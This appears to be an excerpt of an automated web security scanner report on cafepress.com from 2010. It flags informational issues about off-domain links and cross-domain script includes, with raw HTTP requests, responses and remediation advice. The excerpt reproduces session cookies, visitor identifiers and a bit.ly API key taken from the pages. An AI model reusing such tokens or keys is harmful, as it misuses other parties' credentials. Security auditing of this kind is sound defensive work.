http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.mycustomtomtom.com/

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 95181
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 95181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<meta property="og:site_name" content="CafePress.com" />

   <link rel="stylesheet" href="http://content2.cpcache.com/css/marketplace/pdpv4.css?10182010" type="text/css" media="all">

   <script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /></a>
...[SNIP]...
<li><a href="http://www.mycustomtomtom.com" target="_blank">custom gps</a>
...[SNIP]...
</ul>
<img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/>

<div class="clear">
...[SNIP]...

            <img border="0" class="imageborder" name="mainimg" src="http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg" alt="Eat Sleep Game T-Shirt" id="productImageLarge" />
<div class="clear">
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img1','48x48','480x480');setThumbnailPerspective('front');"><img name="img1" src="http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img3','48x48','480x480');setThumbnailPerspective('front');"><img name="img3" src="http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img2','48x48','480x480');setThumbnailPerspective('back');"><img name="img2" src="http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...

<script type="text/javascript" src="http://content5.cpcache.com/js/http_request.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script src="http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"></script>
...[SNIP]...

4.4. http://www.cafepress.com/cp/info/help/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/help/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/cp/info/help/index.aspx?page=privacy_policy.aspx

The response contains the following links to other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://www.mycustomtomtom.com/

Request

GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 58685
Date: Sun, 26 Dec 2010 13:44:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /></a>
...[SNIP]...
<li><a href="http://www.mycustomtomtom.com" target="_blank">custom gps</a>
...[SNIP]...
</ul>
<img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/>

<div class="clear">
...[SNIP]...

4.5. http://www.cafepress.com/cp/info/sell/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/info/sell/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/cp/info/sell/index.aspx?area=learn&page=learn

The response contains the following links to other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content7.cpcache.com/css/sell/sellStyles.css
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://www.mycustomtomtom.com/

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 51638
Date: Sun, 26 Dec 2010 13:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
<meta name="ROBOTS" content="ALL">

<link rel="stylesheet" type="text/css" href="http://content7.cpcache.com/css/sell/sellStyles.css" title="style">


...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /></a>
...[SNIP]...
<li><a href="http://www.mycustomtomtom.com" target="_blank">custom gps</a>
...[SNIP]...
</ul>
<img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/>

<div class="clear">
...[SNIP]...

4.6. http://www.cafepress.com/cp/moredetails.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/moredetails.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/cp/moredetails.aspx?showBleed=false&ProductNo=299007536

The response contains the following links to other domains:

http://content0.cpcache.com/css/marketplace/searchResults.css
http://content1.cpcache.com/js/import.js
http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js
http://content5.cpcache.com/marketplace/img/icon_zoom_in.gif
http://content9.cpcache.com/products/additional_photos/7_1.jpg
http://images6.cpcache.com/product/299007536v4_240x240_Front.jpg
http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg

Request

GET /cp/moredetails.aspx?showBleed=false&ProductNo=299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 5050
Date: Sun, 26 Dec 2010 13:44:58 GMT
Content-Length: 5050
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<META name="robots" content="NoIndex">

<link rel="stylesheet" type="text/css" href="http://content0.cpcache.com/css/marketplace/searchResults.css" title="style">
<style type="text/css">
...[SNIP]...
</script>

<script type="text/javascript" src="http://content1.cpcache.com/js/jquery/jquery-1.2.6.pack.js"></script>
<script type="text/javascript" src="http://content1.cpcache.com/js/import.js"></script>
...[SNIP]...
<td id="displayCell" align="center" valign="middle" style="width:480px;"><img id="image1" src="http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg" width="480"></td>
...[SNIP]...
<A href="?productNo=299007536&colorNo=-1&pr=F&showbleed=false&tab=1&Zoom=1"><img id="imgproductfront" height="50" src="http://images6.cpcache.com/product/299007536v4_240x240_Front.jpg" class="image"></A>
...[SNIP]...
<a href="javascript:swapimg('image1', 'imgproductinfo1')" onclick="document.getElementById('zoom').style.display = 'none';"><img id="imgproductinfo1" height="50" src=http://content9.cpcache.com/products/additional_photos/7_1.jpg class="image"></a>
...[SNIP]...
<A href="?productNo=299007536&pr=&showbleed=false&colorNo=-1&tab=1&Zoom=2"><img src="http://content5.cpcache.com/marketplace/img/icon_zoom_in.gif" border="0"></A>
...[SNIP]...

4.7. http://www.cafepress.com/cp/viewcart.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/cp/viewcart.aspx?s=search

The response contains the following links to other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content2.cpcache.com/css/marketplace/checkout_all.css
http://content3.cpcache.com/css/marketplace/cartv2.css
http://content3.cpcache.com/js/cartv2.js
http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js
http://content8.cpcache.com/js/jquery/thickbox/thickbox.css
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1025648074/?label=Ji8WCOLp2QEQysuI6QM&guid=ON&script=0
http://www.imiclk.com/cgi/r.cgi?m=3&mid=yy37e4r4&ptid=CRTS
http://www.mycustomtomtom.com/

Request

GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 51145
Date: Sun, 26 Dec 2010 13:44:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...


<link rel="STYLESHEET" type="text/css" href="http://content3.cpcache.com/css/marketplace/cartv2.css">
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /></a>
...[SNIP]...
<li><a href="http://www.mycustomtomtom.com" target="_blank">custom gps</a>
...[SNIP]...
</ul>
<img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/>

<div class="clear">
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content2.cpcache.com/css/marketplace/checkout_all.css" title="style">
<link rel="stylesheet" href="http://content8.cpcache.com/js/jquery/thickbox/thickbox.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://content6.cpcache.com/js/jquery/thickbox/thickbox-compressed.js"></script>
...[SNIP]...
</script>
Criteo US End-->

<script type="text/javascript" src="http://content3.cpcache.com/js/cartv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1025648074/?label=Ji8WCOLp2QEQysuI6QM&guid=ON&script=0"/>
</div>
...[SNIP]...
</html>

<IFRAME SRC="http://www.imiclk.com/cgi/r.cgi?m=3&mid=yy37e4r4&ptid=CRTS" FRAMEBORDER="0" SCROLLING="NO" WIDTH="0" HEIGHT="0"></IFRAME>
...[SNIP]...

5. Cross-domain script include previous next
There are 70 instances of this issue:

/
/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/+aprons
/+baby-blanket
/+baby-bodysuits
/+baby-hat
/+bags
/+boxers
/+bumper-stickers
/+buttons
/+calendars
/+clocks
/+coasters
/+eat_sleep_game_light_tshirt,299007536
/+framed-prints
/+greeting_cards
/+hats-caps
/+ipad-cases
/+iphone-cases
/+journals
/+keepsake_boxes
/+license_plate_frames
/+magnets
/+mousepads
/+mugs
/+ornaments
/+posters
/+stadium-blanket
/+steins
/+stocking
/+sweatshirts-hoodies
/+thermos
/+underwear-panties
/+water-bottles
/+womens-tank-tops
/+womens-thongs
/+yoga-mats
/1/1/index1.html
/1/1/indexd1.html
/1/3/index1.html
/1/3/indexb1.html
/1/3/indexc1.html
/cp/info/about/
/cp/info/help/index.aspx
/cp/info/sell/index.aspx
/cp/moredetails.aspx
/cp/sitemap/
/cp/viewcart.aspx
/cp/viewcart.aspx
/make/birth-announcements
/make/custom-baby-gear
/make/custom-buttons
/make/custom-hats
/make/custom-hoodies-sweatshirts
/make/custom-ipad-case
/make/custom-iphone-cases
/make/custom-mugs
/make/custom-stickers
/make/custom-stockings
/make/custom-t-shirts
/make/custom-thermos
/make/custom-water-bottles
/make/holiday-invitations
/make/holiday-photo-cards
/make/personalized-gifts
/make/personalized-ornaments
/sk/TheGamingApe

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

5.1. http://www.cafepress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 